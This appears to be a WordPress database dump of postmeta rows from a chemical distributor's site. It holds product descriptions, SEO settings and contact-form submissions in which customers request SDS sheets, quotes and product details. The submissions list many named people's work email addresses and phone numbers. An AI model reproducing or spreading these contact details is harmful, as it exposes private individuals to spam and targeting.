INSERT INTO `wp_postmeta` VALUES (23742, 2661, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23743, 2661, '_seq_num', '56'); 
INSERT INTO `wp_postmeta` VALUES (23744, 2661, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23745, 2661, '_field_12', 'Brent Clarke'); 
INSERT INTO `wp_postmeta` VALUES (23746, 2661, '_field_13', 'Cable Air Inc'); 
INSERT INTO `wp_postmeta` VALUES (23747, 2661, '_field_18', '81'); 
INSERT INTO `wp_postmeta` VALUES (23748, 2661, '_field_14', 'bclarke@granitelp.com'); 
INSERT INTO `wp_postmeta` VALUES (23749, 2661, '_field_15', '(845) 583-5152'); 
INSERT INTO `wp_postmeta` VALUES (23750, 2661, '_field_16', 'I would like a copy of the Miller Stephenson MS-260 Cleaner.  We use this product everyday at our shop and I am updating our SDS information.  Thank you.\nBrent'); 
INSERT INTO `wp_postmeta` VALUES (23751, 2661, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23752, 2661, '_sub_id', '2661'); 
INSERT INTO `wp_postmeta` VALUES (23753, 1287, '_wp_old_slug', 'sion'); 
INSERT INTO `wp_postmeta` VALUES (23755, 1128, '_yoast_wpseo_focuskw_text_input', 'Dental Handpiece Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (23757, 2663, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23758, 2663, '_seq_num', '54'); 
INSERT INTO `wp_postmeta` VALUES (23759, 2663, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23760, 2663, '_field_1', 'Amber Winters'); 
INSERT INTO `wp_postmeta` VALUES (23761, 2663, '_field_10', 'Prime Data Services Inc.'); 
INSERT INTO `wp_postmeta` VALUES (23762, 2663, '_field_2', 'amber@primedataservices.com'); 
INSERT INTO `wp_postmeta` VALUES (23763, 2663, '_field_8', '5158616600'); 
INSERT INTO `wp_postmeta` VALUES (23764, 2663, '_field_3', 'Hi,\r\n\r\nI hope you find this email in good health.\r\n\r\nWe are B2B contact database provider. We can provide you customized data based on your exact target audience.\r\n\r\nWould you be interested in reaching out the contacts from emerging Space Technology and engineering ?\r\n\r\nWe have complete contact details of Space and satellite engineers, Buyers and procurement specialists Test and measurement engineers Design and R&amp;D engineers, Presidents, VPs, CEOs, CTOs, MDs and GMs, Project managers, Spacecraft, satellite, launch vehicle manufacturers/ operators, Scientists, Aerospace engineers, Systems and application engineers, Quality control managers, Principal engineers and engineering managers, Materials and process engineers, Business development , managers/directors, Manufacturing, tool, instrumentation engineers, Consultants, Academics and students, Field sales and product engineers\r\n\r\nKindly let me know your target criteria so that we can provide you counts, cost and few free samples.\r\n\r\nTarget Industry: \r\nTarget Geography: \r\nTarget Job Title:\r\n\r\nBest Regards\r\nAmber Winters\r\nMarketing Manager\r\nPrime Data Services Inc.'); 
INSERT INTO `wp_postmeta` VALUES (23765, 2663, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23766, 2663, '_sub_id', '2663'); 
INSERT INTO `wp_postmeta` VALUES (23769, 2665, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23770, 2665, '_seq_num', '57'); 
INSERT INTO `wp_postmeta` VALUES (23771, 2665, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23772, 2665, '_field_12', 'Sarah Lakewood'); 
INSERT INTO `wp_postmeta` VALUES (23773, 2665, '_field_13', 'Gamber-Johnson'); 
INSERT INTO `wp_postmeta` VALUES (23774, 2665, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23775, 2665, '_field_14', 'Sarah.Lakewood@gamberjohnson.com'); 
INSERT INTO `wp_postmeta` VALUES (23776, 2665, '_field_15', '(715) 344-3790'); 
INSERT INTO `wp_postmeta` VALUES (23777, 2665, '_field_16', 'Please email me the most recent revisions of the following SDS sheets:  MS-260 Safezone Cleaner for Plastic, Glass &amp; Metal and MS-222N, MS-222T, MS-222F Aero-Duster.  I am hoping to wrap up our update of our SDS manual by the end of this month.  Thank you!'); 
INSERT INTO `wp_postmeta` VALUES (23778, 2665, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23779, 2665, '_sub_id', '2665'); 
INSERT INTO `wp_postmeta` VALUES (23780, 2666, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23781, 2666, '_seq_num', '55'); 
INSERT INTO `wp_postmeta` VALUES (23782, 2666, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23783, 2666, '_field_1', 'Yours truly'); 
INSERT INTO `wp_postmeta` VALUES (23784, 2666, '_field_10', 'Greetings.com'); 
INSERT INTO `wp_postmeta` VALUES (23785, 2666, '_field_2', 'hi@greetings.com'); 
INSERT INTO `wp_postmeta` VALUES (23786, 2666, '_field_8', '(111) 111-1111'); 
INSERT INTO `wp_postmeta` VALUES (23787, 2666, '_field_3', 'I wish you a happy day!, I wish you a happy day!, I wish you a happy day! ,I wish you a happy day! ,I wish you a happy day!'); 
INSERT INTO `wp_postmeta` VALUES (23788, 2666, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23789, 2666, '_sub_id', '2666'); 
INSERT INTO `wp_postmeta` VALUES (23790, 2667, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23791, 2667, '_seq_num', '58'); 
INSERT INTO `wp_postmeta` VALUES (23792, 2667, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23793, 2667, '_field_12', 'Jessica Szakos'); 
INSERT INTO `wp_postmeta` VALUES (23794, 2667, '_field_13', 'Milacron'); 
INSERT INTO `wp_postmeta` VALUES (23795, 2667, '_field_18', '84'); 
INSERT INTO `wp_postmeta` VALUES (23796, 2667, '_field_14', 'jessica_szakos@milacron.com'); 
INSERT INTO `wp_postmeta` VALUES (23797, 2667, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (23798, 2667, '_field_16', 'Looking for SDS for MS-230.  Please send via e-mail. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (23799, 2667, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23800, 2667, '_sub_id', '2667'); 
INSERT INTO `wp_postmeta` VALUES (23801, 1755, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23802, 190, '_wp_old_slug', 'ms-470s-12-oz-aerosol'); 
INSERT INTO `wp_postmeta` VALUES (23803, 190, '_yoast_wpseo_focuskw_text_input', 'MS-470S'); 
INSERT INTO `wp_postmeta` VALUES (23804, 190, '_yoast_wpseo_focuskw', 'MIL-Spec Urethane Conformal Coating'); 
INSERT INTO `wp_postmeta` VALUES (23805, 190, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23806, 877, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23807, 877, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23808, 877, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23809, 877, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23810, 877, '_ywtm_content_tab_description', 'EPON 828 resin is an undiluted clear difunctional bisphenol A/epichlorohydrin derived liquid epoxy resin. When cross-linked or hardened with appropriate curing agents, very good mechanical, adhesive, dielectric and chemical resistance properties are obtained. Because of this versatility, EPON Resin 828 has become a standard epoxy resin used in formulation, fabrication and fusion technology. Benefits include:\r\n<ul>\r\n 	<li>Fiber reinforced pipes, tanks and composites</li>\r\n 	<li>Tooling, casting and molding compounds</li>\r\n 	<li>Construction, electrical and aerospace adhesives</li>\r\n 	<li>High solids/low VOC maintenance and marine coatings</li>\r\n 	<li>Electrical encapsulations and laminates</li>\r\n 	<li>Chemical resistant tank linings, flooring and grouts</li>\r\n 	<li>Base resin for epoxy fusion technology</li>\r\n</ul>\r\nEPON™ liquid epoxy resins are the most important products sold in the epoxy resin market, and one of the foundations of Hexion. The basis of the product line is EPON Resin 828, which is a liquid resin also described as diglycidyl ether of Bisphenol A. This key resin is complemented in the range by EPON Resin 862, the diglycidyl ether of Bisphenol F, and a full series of modified liquid epoxy resins, epoxy resin blends and purified epoxy resins.\r\n\r\n<strong>Application</strong>\r\n\r\nEPON liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing.'); 
INSERT INTO `wp_postmeta` VALUES (23811, 877, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23812, 2668, '_edit_lock', '1476904472:3'); 
INSERT INTO `wp_postmeta` VALUES (23813, 2668, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (23814, 2668, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (23815, 2668, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23816, 2668, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23817, 2668, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23818, 2668, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (23819, 2670, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23820, 2670, '_seq_num', '59'); 
INSERT INTO `wp_postmeta` VALUES (23821, 2670, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23822, 2670, '_field_12', 'Paul Humphreys'); 
INSERT INTO `wp_postmeta` VALUES (23823, 2670, '_field_13', 'Applied Technologies Associates'); 
INSERT INTO `wp_postmeta` VALUES (23824, 2670, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23825, 2670, '_field_14', 'paul.humphreys@scientificdrilling.com'); 
INSERT INTO `wp_postmeta` VALUES (23826, 2670, '_field_15', '(805) 239-9100'); 
INSERT INTO `wp_postmeta` VALUES (23827, 2670, '_field_16', 'Require SDS/MSDS for two products please:\r\nMS-944\r\nMS-381\r\nThanks.'); 
INSERT INTO `wp_postmeta` VALUES (23828, 2670, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23829, 2670, '_sub_id', '2670'); 
INSERT INTO `wp_postmeta` VALUES (23830, 2671, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23831, 2671, '_seq_num', '60'); 
INSERT INTO `wp_postmeta` VALUES (23832, 2671, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23833, 2671, '_field_12', 'Tim Crain'); 
INSERT INTO `wp_postmeta` VALUES (23834, 2671, '_field_13', 'Honeybee Robotics'); 
INSERT INTO `wp_postmeta` VALUES (23835, 2671, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23836, 2671, '_field_14', 'crain@honeybeerobotics.com'); 
INSERT INTO `wp_postmeta` VALUES (23837, 2671, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (23838, 2671, '_field_16', 'Good day,\r\n\r\nI have recently received 4 cans of your PTFE Release Agent Dry Lubricant MS-122AD in an order from Grainger. Lot# 35RN35. I was hoping that you might be able to provide me with a certificate of analysis for this. \r\n\r\nMuch appreciated,\r\nTim'); 
INSERT INTO `wp_postmeta` VALUES (23839, 2671, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23840, 2671, '_sub_id', '2671'); 
INSERT INTO `wp_postmeta` VALUES (23841, 2672, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23842, 2672, '_seq_num', '56'); 
INSERT INTO `wp_postmeta` VALUES (23843, 2672, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23844, 2672, '_field_1', 'Fred Jiran'); 
INSERT INTO `wp_postmeta` VALUES (23845, 2672, '_field_10', 'CODEVCO LLC'); 
INSERT INTO `wp_postmeta` VALUES (23846, 2672, '_field_2', 'fredjiran@codevco.ws'); 
INSERT INTO `wp_postmeta` VALUES (23847, 2672, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (23848, 2672, '_field_3', 'Please provide cost and availability of one drum quantity of Epon 826\r\nEpoxy room temp cure laminating resin or similar product. I expect a heat distortion temp &gt; 140F\r\n\r\nThank you,  Fred'); 
INSERT INTO `wp_postmeta` VALUES (23849, 2672, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23850, 2672, '_sub_id', '2672'); 
INSERT INTO `wp_postmeta` VALUES (23851, 2673, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23852, 2673, '_seq_num', '61'); 
INSERT INTO `wp_postmeta` VALUES (23853, 2673, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23854, 2673, '_field_12', 'Ron Bragg'); 
INSERT INTO `wp_postmeta` VALUES (23855, 2673, '_field_13', 'US Bureau of Reclamation'); 
INSERT INTO `wp_postmeta` VALUES (23856, 2673, '_field_18', '90'); 
INSERT INTO `wp_postmeta` VALUES (23857, 2673, '_field_14', 'ron@nopean.com'); 
INSERT INTO `wp_postmeta` VALUES (23858, 2673, '_field_15', '(360) 216-2973'); 
INSERT INTO `wp_postmeta` VALUES (23859, 2673, '_field_16', 'Hi,\r\nPlease send us the latest updated USA-OSHA(GHS) MSDS’s for the below mentioned products,\r\n\r\n1. MS 260 Safezone Cleaner for Plastic Glass and Metal\r\nPTFE RELEASE AGENT DRY LUBRICANT MS 122DF \r\nAERO DUSTER MS 222N MS 222T MS 222F\r\n	\r\nThanks,\r\nRon Bragg'); 
INSERT INTO `wp_postmeta` VALUES (23860, 2673, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23861, 2673, '_sub_id', '2673'); 
INSERT INTO `wp_postmeta` VALUES (23862, 2674, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23863, 2674, '_seq_num', '57'); 
INSERT INTO `wp_postmeta` VALUES (23864, 2674, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23865, 2674, '_field_1', 'Zied Bouaffoura'); 
INSERT INTO `wp_postmeta` VALUES (23866, 2674, '_field_10', 'ELEKTRON TECHNOLOGY'); 
INSERT INTO `wp_postmeta` VALUES (23867, 2674, '_field_2', 'Zied.bouaffoura@bulgin.com'); 
INSERT INTO `wp_postmeta` VALUES (23868, 2674, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (23869, 2674, '_field_3', 'hello,\r\ncould you provide me with a quotation for the mold release agent type MS 122  ?\r\n\r\nregards,\r\nZied bouaffoura'); 
INSERT INTO `wp_postmeta` VALUES (23870, 2674, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23871, 2674, '_sub_id', '2674'); 
INSERT INTO `wp_postmeta` VALUES (23872, 120, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23873, 122, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23874, 1842, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23875, 2679, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23876, 2679, '_seq_num', '62'); 
INSERT INTO `wp_postmeta` VALUES (23877, 2679, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23878, 2679, '_field_12', 'Rosanne Camacho'); 
INSERT INTO `wp_postmeta` VALUES (23879, 2679, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (23880, 2679, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23881, 2679, '_field_14', 'roscamac@cisco.com'); 
INSERT INTO `wp_postmeta` VALUES (23882, 2679, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (23883, 2679, '_field_16', 'Need updated SDS for:\nMS-242N-AS\nMS-725M'); 
INSERT INTO `wp_postmeta` VALUES (23884, 2679, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23885, 2679, '_sub_id', '2679'); 
INSERT INTO `wp_postmeta` VALUES (23886, 2680, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23887, 2680, '_seq_num', '63'); 
INSERT INTO `wp_postmeta` VALUES (23888, 2680, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23889, 2680, '_field_12', 'Jason Howard'); 
INSERT INTO `wp_postmeta` VALUES (23890, 2680, '_field_13', 'Naval Surface Warfare Center Crane Division'); 
INSERT INTO `wp_postmeta` VALUES (23891, 2680, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23892, 2680, '_field_14', 'jason.d.howard.ctr@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (23893, 2680, '_field_15', '(812) 854-4411'); 
INSERT INTO `wp_postmeta` VALUES (23894, 2680, '_field_16', 'We use MS-550 in one of our labs.  We are attempting to purchase some from one of our distributors.  He is telling me that the MS-550 has been discontinued and that MS-550N is it&#039;s replacement.  \nIs that correct?  If so, what is the difference between the two?\n\nThanks,\nJason'); 
INSERT INTO `wp_postmeta` VALUES (23895, 2680, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23896, 2680, '_sub_id', '2680'); 
INSERT INTO `wp_postmeta` VALUES (23897, 2681, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23898, 2681, '_seq_num', '58'); 
INSERT INTO `wp_postmeta` VALUES (23899, 2681, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23900, 2681, '_field_1', 'Jérôme Palombo'); 
INSERT INTO `wp_postmeta` VALUES (23901, 2681, '_field_10', 'Cartones Yaguareté S.A.'); 
INSERT INTO `wp_postmeta` VALUES (23902, 2681, '_field_2', 'Jerome.Palombo@cysa.com.py'); 
INSERT INTO `wp_postmeta` VALUES (23903, 2681, '_field_8', '(595) 216-5990'); 
INSERT INTO `wp_postmeta` VALUES (23904, 2681, '_field_3', 'Dear ladies and gentleman,\r\ni would be very pleased if you sent a calculation for 20 kg of your product GPL 226 to my email address. I look forward to hearing from you.\r\nJérôme Palombo from Cartones Yaguareté'); 
INSERT INTO `wp_postmeta` VALUES (23905, 2681, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23906, 2681, '_sub_id', '2681'); 
INSERT INTO `wp_postmeta` VALUES (23907, 2682, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23908, 2682, '_seq_num', '59'); 
INSERT INTO `wp_postmeta` VALUES (23909, 2682, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23910, 2682, '_field_1', 'Mark Goodrich'); 
INSERT INTO `wp_postmeta` VALUES (23911, 2682, '_field_10', 'W. L. Gore &amp; Associates'); 
INSERT INTO `wp_postmeta` VALUES (23912, 2682, '_field_2', 'mgoodric@wlgore.com'); 
INSERT INTO `wp_postmeta` VALUES (23913, 2682, '_field_8', '(302) 292-4347'); 
INSERT INTO `wp_postmeta` VALUES (23914, 2682, '_field_3', 'Hello- I am interested in potentially using Krytox as a dielectric fluid for AC voltage endurance testing at elevated temperature (~200C).  Do you have information on dielectric properties of Krytox, and could you please provide a quote for small quantities (on the order of a liter or two) of the 105 and 106 grades?  Thanks!'); 
INSERT INTO `wp_postmeta` VALUES (23915, 2682, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23916, 2682, '_sub_id', '2682'); 
INSERT INTO `wp_postmeta` VALUES (23917, 2683, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23918, 2683, '_seq_num', '64'); 
INSERT INTO `wp_postmeta` VALUES (23919, 2683, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23920, 2683, '_field_12', 'Eric Grulke'); 
INSERT INTO `wp_postmeta` VALUES (23921, 2683, '_field_13', 'University of Kentucky'); 
INSERT INTO `wp_postmeta` VALUES (23922, 2683, '_field_18', '97'); 
INSERT INTO `wp_postmeta` VALUES (23923, 2683, '_field_14', 'grulke@uky.edu'); 
INSERT INTO `wp_postmeta` VALUES (23924, 2683, '_field_15', '(859) 257-6097'); 
INSERT INTO `wp_postmeta` VALUES (23925, 2683, '_field_16', 'I would like safety/handling info on your VAZO initiators. we are doing a senior design problem on batch polymerization.  initiator choices are AIBA or AIBN: I would like to distribute the material to the design teams\r\n'); 
INSERT INTO `wp_postmeta` VALUES (23926, 2683, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23927, 2683, '_sub_id', '2683'); 
INSERT INTO `wp_postmeta` VALUES (23928, 2684, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23929, 2684, '_seq_num', '65'); 
INSERT INTO `wp_postmeta` VALUES (23930, 2684, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23931, 2684, '_field_12', 'Adilson Akazawa'); 
INSERT INTO `wp_postmeta` VALUES (23932, 2684, '_field_13', 'Mectron'); 
INSERT INTO `wp_postmeta` VALUES (23933, 2684, '_field_18', '#98'); 
INSERT INTO `wp_postmeta` VALUES (23934, 2684, '_field_14', 'akazawa@odebrecht.com'); 
INSERT INTO `wp_postmeta` VALUES (23935, 2684, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (23936, 2684, '_field_16', 'I need the SDS for MS-472C\nthank you'); 
INSERT INTO `wp_postmeta` VALUES (23937, 2684, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23938, 2684, '_sub_id', '2684'); 
INSERT INTO `wp_postmeta` VALUES (23939, 2685, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23940, 2685, '_seq_num', '66'); 
INSERT INTO `wp_postmeta` VALUES (23941, 2685, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23942, 2685, '_field_12', 'Leo Perez'); 
INSERT INTO `wp_postmeta` VALUES (23943, 2685, '_field_13', 'TCI'); 
INSERT INTO `wp_postmeta` VALUES (23944, 2685, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23945, 2685, '_field_14', 'lperez@tcimro.com'); 
INSERT INTO `wp_postmeta` VALUES (23946, 2685, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (23947, 2685, '_field_16', 'just need the updated copy of SDS for product MS-242N-AS'); 
INSERT INTO `wp_postmeta` VALUES (23948, 2685, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23949, 2685, '_sub_id', '2685'); 
INSERT INTO `wp_postmeta` VALUES (23950, 2686, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23951, 2686, '_seq_num', '67'); 
INSERT INTO `wp_postmeta` VALUES (23952, 2686, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23953, 2686, '_field_12', 'Tricia Wilson'); 
INSERT INTO `wp_postmeta` VALUES (23954, 2686, '_field_13', 'Honeywell FM&amp;T'); 
INSERT INTO `wp_postmeta` VALUES (23955, 2686, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23956, 2686, '_field_14', 'tmwilson@kcp.com'); 
INSERT INTO `wp_postmeta` VALUES (23957, 2686, '_field_15', '(816) 488-5094'); 
INSERT INTO `wp_postmeta` VALUES (23958, 2686, '_field_16', 'Please email me the current SDS for Epon 815C ASAP'); 
INSERT INTO `wp_postmeta` VALUES (23959, 2686, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23960, 2686, '_sub_id', '2686'); 
INSERT INTO `wp_postmeta` VALUES (23961, 2687, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23962, 2687, '_seq_num', '60'); 
INSERT INTO `wp_postmeta` VALUES (23963, 2687, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23964, 2687, '_field_1', 'Donald Lemke'); 
INSERT INTO `wp_postmeta` VALUES (23965, 2687, '_field_10', 'SUNY Downstate Medical Center'); 
INSERT INTO `wp_postmeta` VALUES (23966, 2687, '_field_2', 'don.lemke@downstate.edu'); 
INSERT INTO `wp_postmeta` VALUES (23967, 2687, '_field_8', '(718) 270-7421'); 
INSERT INTO `wp_postmeta` VALUES (23968, 2687, '_field_3', 'Do you still manufacture/distribute Safezone cleaner.  we do not find it on your web page.  Please advise.'); 
INSERT INTO `wp_postmeta` VALUES (23969, 2687, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23970, 2687, '_sub_id', '2687'); 
INSERT INTO `wp_postmeta` VALUES (23971, 2689, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23972, 2689, '_seq_num', '68'); 
INSERT INTO `wp_postmeta` VALUES (23973, 2689, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23974, 2689, '_field_12', 'bob prytko'); 
INSERT INTO `wp_postmeta` VALUES (23975, 2689, '_field_13', 'Sunovion'); 
INSERT INTO `wp_postmeta` VALUES (23976, 2689, '_field_18', '103'); 
INSERT INTO `wp_postmeta` VALUES (23977, 2689, '_field_14', 'bob.prytko@sunovion.com'); 
INSERT INTO `wp_postmeta` VALUES (23978, 2689, '_field_15', '(508) 357-7423'); 
INSERT INTO `wp_postmeta` VALUES (23979, 2689, '_field_16', 'I have a 1L bottle of Vertrel SMT here.  Would you send me a SDS so my technician can start using this?  Thanks, bob'); 
INSERT INTO `wp_postmeta` VALUES (23980, 2689, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23981, 2689, '_sub_id', '2689'); 
INSERT INTO `wp_postmeta` VALUES (23982, 1924, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23983, 861, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23984, 861, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23985, 861, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23986, 861, '_yoast_wpseo_focuskw_text_input', 'EPON 826'); 
INSERT INTO `wp_postmeta` VALUES (23987, 861, '_yoast_wpseo_focuskw', 'EPON 826'); 
INSERT INTO `wp_postmeta` VALUES (23988, 861, '_yoast_wpseo_metadesc', 'EPON 826 resin is a low viscosity, light colored liquid bisphenol A based epoxy resin. It finds use in a variety of applications (coatings and composites).'); 
INSERT INTO `wp_postmeta` VALUES (23989, 861, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23990, 861, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23991, 861, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23992, 861, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23993, 861, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23994, 861, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23995, 861, '_ywtm_content_tab_description', 'EPON 826 is a low viscosity, light colored liquid bisphenol A based epoxy resin. It finds use in a variety of applications (coatings and composites) when crosslinked or hardened with appropriate curing agents. Miller-Stephenson is a certified EPON 826 Supplier and the Benefits of EPON 826 include:\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Low color</li>\r\n 	<li>Low ionic contamination</li>\r\n 	<li>Reacts with a full range of curing agents</li>\r\n 	<li>Produces high-strength cured systems resistant to chemical attack</li>\r\n</ul>\r\nEPON 826 is commonly used to fabricate high strength fiber reinforced pipes and composites. The low viscosity of the resin provides rapid wetout of a wide range of reinforcing fibers including glass, graphite, aramid and boron. High fiber content with low void content can be achieved with this resin. Structural composites such as this have a high ratio of strength to weight. This makes them suitable for applications ranging from sporting goods equipment to aerospace structural members.\r\n\r\nEPON Resin 826 systems are also excellent electrical insulators. Such systems are used frequently in electrical encapsulations, laminates and molding compounds.Structures, linings and coatings made with EPON Resin 826 protect metal surfaces and resist attack from acids, bases, solvents and fuel. They find use in the oil, gas, mining and chemical industries.The higher shear strength obtained with EPON Resin 826 adhesives is due in part to the low internal stresses inherent in cured epoxy resins. Such adhesives are used to bond a broad range of substrates<span class="GramE">..</span>\r\n\r\n<strong>Application</strong>\r\n\r\nEPON liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing. Cured EPON resins are generally regarded as being high strength materials, since many commonly used systems provide tensile strengths greater than 10,000 psi and modulus values greater than 400,000 psi\r\n\r\nMiller-Stephenson is an Epon 826 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications.'); 
INSERT INTO `wp_postmeta` VALUES (23996, 861, '_yoast_wpseo_linkdex', '95'); 
INSERT INTO `wp_postmeta` VALUES (23997, 2690, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23998, 2690, '_seq_num', '61'); 
INSERT INTO `wp_postmeta` VALUES (23999, 2690, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24000, 2690, '_field_1', 'Abel'); 
INSERT INTO `wp_postmeta` VALUES (24001, 2690, '_field_10', 'Hardware Specialty'); 
INSERT INTO `wp_postmeta` VALUES (24002, 2690, '_field_2', 'aherrera@hardwarespecialty.com'); 
INSERT INTO `wp_postmeta` VALUES (24003, 2690, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (24004, 2690, '_field_3', ' We received 31 gallons of Hexion EPON Resin 815C from you in our PO# 2221886. Could you please send me the MSDS for this item as soon as possible?\n Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (24005, 2690, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24006, 2690, '_sub_id', '2690'); 
INSERT INTO `wp_postmeta` VALUES (24007, 2692, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24008, 2692, '_seq_num', '62'); 
INSERT INTO `wp_postmeta` VALUES (24009, 2692, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24010, 2692, '_field_1', 'LAHOUD'); 
